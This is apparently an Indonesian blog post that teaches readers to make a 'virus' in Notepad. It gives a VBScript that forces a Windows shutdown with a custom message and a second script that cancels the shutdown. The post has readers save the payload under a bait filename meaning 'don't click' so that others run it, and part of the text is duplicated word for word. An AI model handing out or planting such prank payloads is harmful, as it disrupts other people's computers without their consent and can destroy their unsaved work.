MEMBUAT VIRUS DENGAN NOTEPAD DAN PENAWARNYA
Membuat virus
shutdown dengan notepad
Bayangkan, bila anda membuat virus yang otomatis mengshutdown computer yang terinfeksi, dengan disertai pesan apa saja selama 30 detik sebelum computer tershutdown.
let`s begin!
langkah-langah:
1. buka notepad
2 copy+paste yang bercetak tebal dibawah ini:
option explicit
dim wshshell
set wshshell=wscript.createobject("wscript.shell")
dim x
for x = 1 to 1
wshshell.run "shutdown -s -c INDOCRACKER.WETPAINT.COM"
next
Bayangkan, bila anda membuat virus yang otomatis mengshutdown computer yang terinfeksi, dengan disertai pesan apa saja selama 30 detik sebelum computer tershutdown.
let`s begin!
langkah-langah:
1. buka notepad
2 copy+paste yang bercetak tebal dibawah ini:
option explicit
dim wshshell
set wshshell=wscript.createobject("wscript.shell")
dim x
for x = 1 to 1
wshshell.run "shutdown -s -c INDOCRACKER.WETPAINT.COM"
next
3. ganti INDOCRACKER.WETPAINT.COM dengan pesan apa saja yang anda inginkan.
Ingat! tanpa spasi
4. save file dengan nama jangan di klik.vbs (pastikan ”save as type” diubah ke ”all files”
sekarang, kita buat penawarnya:
1. buka notepad
2 copy+paste yang bercetak tebal dibawah ini:
option explicit
dim wshshell
set wshshell=wscript.createobject("wscript.shell")
dim x
for x = 1 to 1
wshshell.run "shutdown -a"
next
3. save file dengan nama penawar.vbs (pastikan ”save as type” diubah ke ”all files”
Silahkan coba virus yang sudah anda buat.
Tidak ada komentar:
Posting Komentar
Selamat Datang Di Blogger Ignasius Fandy Jayanto